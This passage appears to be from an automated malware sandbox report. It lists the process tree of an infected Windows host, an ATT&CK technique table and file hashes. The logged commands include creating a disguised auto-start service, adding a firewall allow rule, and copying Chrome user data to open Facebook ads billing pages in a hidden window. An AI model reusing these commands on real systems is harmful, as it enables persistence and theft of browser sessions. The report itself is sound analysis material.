                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\77-c5675-643-c67af-e45fe59ab1125\Kekenurewe.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\77-c5675-643-c67af-e45fe59ab1125\Kekenurewe.exe"
                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                          PID:7140
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8c-17997-665-679bf-ce5b991faaf5b\SHimylazhaba.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\8c-17997-665-679bf-ce5b991faaf5b\SHimylazhaba.exe"
                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                            PID:6732
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gybm1o0q.rx4\google-game.exe & exit
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:2172
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\gybm1o0q.rx4\google-game.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\gybm1o0q.rx4\google-game.exe
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                    PID:5428
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\gybm1o0q.rx4\google-game.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\gybm1o0q.rx4\google-game.exe" -a
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                        PID:4284
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nwlkf3fr.oxl\toolspab1.exe & exit
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:5396
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nwlkf3fr.oxl\toolspab1.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\nwlkf3fr.oxl\toolspab1.exe
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                          PID:1924
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nwlkf3fr.oxl\toolspab1.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\nwlkf3fr.oxl\toolspab1.exe
                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                              PID:3768
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okgpa4tl.ozi\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:3516
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\okgpa4tl.ozi\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\okgpa4tl.ozi\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                PID:2116
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9C10.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                    PID:5148
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9C10.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                      PID:7916
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9C10.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                        PID:4404
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9C10.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                          PID:3944
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                            PID:6184
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\34xn4d0c.svs\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:4128
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F712.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F712.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:3476
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F712.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\F712.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:5956
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F946.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F946.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4032
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qefmbguj\
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:1788
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\peiqysd.exe" C:\Windows\SysWOW64\qefmbguj\
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:5756
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" create qefmbguj binPath= "C:\Windows\SysWOW64\qefmbguj\peiqysd.exe /d\"C:\Users\Admin\AppData\Local\Temp\F946.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:1620
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" description qefmbguj "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start qefmbguj
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5560
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FF42.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FF42.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                    PID:4660
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:764
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                                                                                                                                        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                        PID:4212
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6384
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ffa01714f50,0x7ffa01714f60,0x7ffa01714f70
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6392
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6952
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6944
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1836 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6936
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5212
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:632
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4408
                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3384
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4620
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,24385383628030232,17559048439840265661,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6556
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\qefmbguj\peiqysd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\qefmbguj\peiqysd.exe /d"C:\Users\Admin\AppData\Local\Temp\F946.exe"
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1044
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:992
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                PID:3032
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                PID:1832
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                PID:4156
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4848
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                    PID:1136
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1016
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                                      werfault.exe /h /shared Global\42538153276d44bd9f3943cacc752b8e /t 5612 /p 4848
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6736
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                          "LogonUI.exe" /flags:0x0 /state0:0xa3af5055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:7588
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7348
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6036

                                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                              File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1222

                                                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arnatic_7.exe.log
                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                84cfdb4b995b1dbf543b26b86c863adc

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_1.exe
